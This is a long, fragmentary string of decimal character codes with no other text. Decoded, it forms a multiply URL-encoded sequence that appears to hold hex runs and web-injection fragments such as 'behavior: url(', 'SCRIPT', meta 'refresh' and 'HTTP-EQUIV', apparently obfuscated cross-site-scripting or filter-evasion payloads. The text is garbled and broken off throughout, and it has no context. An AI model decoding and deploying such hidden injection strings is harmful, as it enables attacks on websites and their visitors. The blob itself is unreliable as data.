52,37,50,53,50,67,57,50,37,50,53,50,67,57,51,37,50,53,50,67,57,52,37,50,53,50,67,57,54,37,50,53,50,67,54,49,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,52,56,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,57,57,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,53,50,37,50,53,50,67,53,55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7,37,50,53,50,67,51,57,37,50,53,50,67,53,57,37,50,53,50,67,51,51,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,51,52,37,50,53,50,67,54,48,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,54,50,37,50,53,50,67,54,49,37,50,53,50,67,51,56,37,50,53,50,67,49,50,51,37,50,53,50,67,52,48,37,50,53,50,67,52,49,37,50,53,50,67,49,50,53,37,50,53,50,67,51,5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53,52,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,53,48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3,49,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,53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7,54,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,57,57,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,57,54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1,52,37,50,53,50,67,51,52,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,49,48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51,50,37,50,53,50,67,51,56,37,50,53,50,67,51,53,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,57,37,50,53,50,67,51,50,37,50,53,50,67,51,50,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,57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49,48,49,37,50,53,50,67,49,48,52,37,50,53,50,67,57,55,37,50,53,50,67,49,49,56,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,53,56,37,50,53,50,67,51,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,56,37,50,53,50,67,52,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,48,37,50,53,50,67,53,55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48,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,54,50,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,53,51,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,53,48,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,54,48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2,37,50,53,50,67,53,57,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,52,55,37,50,53,50,67,52,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7,37,50,53,50,67,49,48,50,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,51,5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5,57,37,50,53,50,67,54,56,37,50,53,50,67,56,57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7,55,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50,53,50,67,53,51,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,52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6,37,50,53,50,67,56,48,37,50,53,50,67,56,53,37,50,53,50,67,56,52,37,50,53,50,67,51,50,37,50,53,50,67,56,52,37,50,53,50,67,56,57,37,50,53,50,67,56,48,37,50,53,50,67,54,57,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,55,51,37,50,53,50,67,55,55,37,50,53,50,67,54,53,37,50,53,50,67,55,49,37,50,53,50,67,54,57,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,52,57,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,48,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48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5,57,37,50,53,50,67,54,56,37,50,53,50,67,56,57,37,50,53,50,67,51,50,37,50,53,50,67,55,57,37,50,53,50,67,55,56,37,50,53,50,67,55,54,37,50,53,50,67,55,57,37,50,53,50,67,54,53,37,50,53,50,67,54,56,37,50,53,50,67,54,49,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,53,51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4,56,37,50,53,50,67,56,57,37,50,53,50,67,55,56,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,53,51,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,49,48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5,54,37,50,53,50,67,55,57,37,50,53,50,67,56,55,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,52,56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5,49,37,50,53,50,67,56,51,37,50,53,50,67,55,57,37,50,53,50,67,56,53,37,50,53,50,67,55,56,37,50,53,50,67,54,56,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,53,54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6,50,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,55,51,37,50,53,50,67,57,48,37,50,53,50,67,54,57,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,51,56,37,50,53,50,67,49,50,51,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,49,50,53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4,37,50,53,50,67,55,51,37,50,53,50,67,55,56,37,50,53,50,67,55,53,37,50,53,50,67,51,50,37,50,53,50,67,56,50,37,50,53,50,67,54,57,37,50,53,50,67,55,54,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,54,37,50,53,50,67,49,50,49,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,54,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,55,50,37,50,53,50,67,56,50,37,50,53,50,67,54,57,37,50,53,50,67,55,48,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48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7,37,50,53,50,67,49,49,56,37,50,53,50,67,57,56,37,50,53,50,67,49,49,53,37,50,53,50,67,57,57,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,54,37,50,53,50,67,53,56,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,53,51,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,51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49,48,57,37,50,53,50,67,49,49,49,37,50,53,50,67,57,57,37,50,53,50,67,49,48,52,37,50,53,50,67,57,55,37,50,53,50,67,53,56,37,50,53,50,67,57,49,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,57,51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49,48,56,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,56,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,57,57,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,54,37,50,53,50,67,53,56,37,50,53,50,67,57,49,37,50,53,50,67,52,56,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,57,51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54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,52,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,54,55,37,50,53,50,67,55,57,37,50,53,50,67,55,56,37,50,53,50,67,56,52,37,50,53,50,67,54,57,37,50,53,50,67,55,56,37,50,53,50,67,56,52,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,52,56,37,50,53,50,67,53,57,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,56,37,50,53,50,67,54,49,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,57,56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7,57,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,53,55,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,53,52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1,50,37,50,53,50,67,54,54,37,50,53,50,67,54,53,37,50,53,50,67,54,55,37,50,53,50,67,55,53,37,50,53,50,67,55,49,37,50,53,50,67,56,50,37,50,53,50,67,55,57,37,50,53,50,67,56,53,37,50,53,50,67,55,56,37,50,53,50,67,54,56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49,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,53,49,37,50,53,50,67,52,56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4,50,37,50,53,50,67,54,48,37,50,53,50,67,56,52,37,50,53,50,67,54,56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7,56,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,3